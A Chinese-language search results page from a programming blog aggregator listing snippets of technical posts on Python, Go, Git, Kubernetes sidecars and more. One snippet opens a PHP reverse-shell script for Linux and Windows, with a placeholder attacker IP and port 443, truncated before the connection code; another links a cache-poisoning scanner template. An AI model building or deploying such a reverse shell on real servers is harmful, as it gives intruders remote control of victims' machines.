码迷,mamicode.com
首页 >  
搜索关键字:user principal name    ( 128024个结果
毕业四年,我当初是如何走上编程这条路的!
题记 感概万千,毕业已达4年之久。 想起在大学时期学习编程的事情,感觉很有意义,在此记录回顾一下。 希望自己初心未变,勇往向前 现状与过去 20210706 目前的我是在天津一家公司做软件开发,主要做C#桌面端开发,有时还写点Android,但主技还是C#、ASP.NET。 从毕业实习到现在一直在这 ...
分类:其他好文   时间:2021-07-12 17:55:27    阅读次数:0
初始python 之 自动拆分转换文本内容
上一篇升级版,转换文件内容。 #!/user/bin env python # author:Simple-Sir # time:2021/7/9 23:32 def txt_2_list(filename): dic = {} dic_k = [] dic_v = [] with open(fil ...
分类:编程语言   时间:2021-07-09 17:54:52    阅读次数:0
Python -m 的典型用法、原理解析与发展演变
在命令行中使用 Python 时,它可以接收大约 20 个选项(option),语法格式如下: 1 python [-bBdEhiIOqsSuvVWx?] [-c command | -m module-name | script | - ] [args] 本文想要聊聊比较特殊的“-m”选项: 关于 ...
分类:编程语言   时间:2021-07-09 17:51:18    阅读次数:0
HTML基本结构
https://images.cnblogs.com/cnblogs_com/dyfblogs/1530965/o_ply.png ...
分类:Web程序   时间:2021-07-07 17:51:32    阅读次数:0
go语言defer
defer是延迟执行。如果存在多个defer,运行顺序是先进后出,属于堆栈结构 f, err := os.Create(fileName) if err != nil { fmt.Println("Create file failed:", err) return nil, err } defer ...
分类:编程语言   时间:2021-07-05 19:08:05    阅读次数:0
高级属性的定义
普通属性直接赋值,高级属性可以根据你的业务需要进行赋值, /* 定义高级属性 */ const user = { _age: 0 } //这种方式定义的age无法存储数,只是对某个变量成员的代理,加入get和set的目是让你的属性具有 //了行为,也就是我们可以再访问或者是设置属性的时候,添加更多的 ...
分类:其他好文   时间:2021-07-05 19:07:14    阅读次数:0
检测configMap,重载Pod内的业务容器
Usage: 使用sidecar模式,跟业务进程运行在同一个Pod内,检测到configMap更新后,会自动触发Hook - name: prometheus-server-configmap-reload image: 'jimmidyson/configmap-reload:v0.3.0' ar ...
分类:其他好文   时间:2021-07-05 19:01:41    阅读次数:0
4. Git基本工作流程
4. Git基本工作流程 Git工作区域 向仓库中添加文件流程 4. Git初始化及仓库创建和操作 基本信息设置 1. 设置用户名 git config --global user.name 'itcastphpgit1' 2. 设置用户名邮箱 git config --global user.em ...
分类:其他好文   时间:2021-07-05 19:01:11    阅读次数:0
PHP反弹脚本 Linux/Windows两用
<?php error_reporting (E_ERROR); ignore_user_abort(true); ini_set('max_execution_time',0); $ipaddr = 'xxx.xxx.xxx.xxx'; $port = '443'; $msg = php_unam ...
分类:Windows程序   时间:2021-07-05 19:00:38    阅读次数:0
Automate Cache Poisoning Vulnerability
https://blog.melbadry9.xyz/fuzzing/nuclei-cache-poisoning id: cache-poisoning info: name: Cache Poisoning author: melbadry9 & xelkomy severity: lowreq ...
分类:系统相关   时间:2021-07-05 18:59:59    阅读次数:0
128024条   上一页 1 2 3 4 5 ... 12803 下一页
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!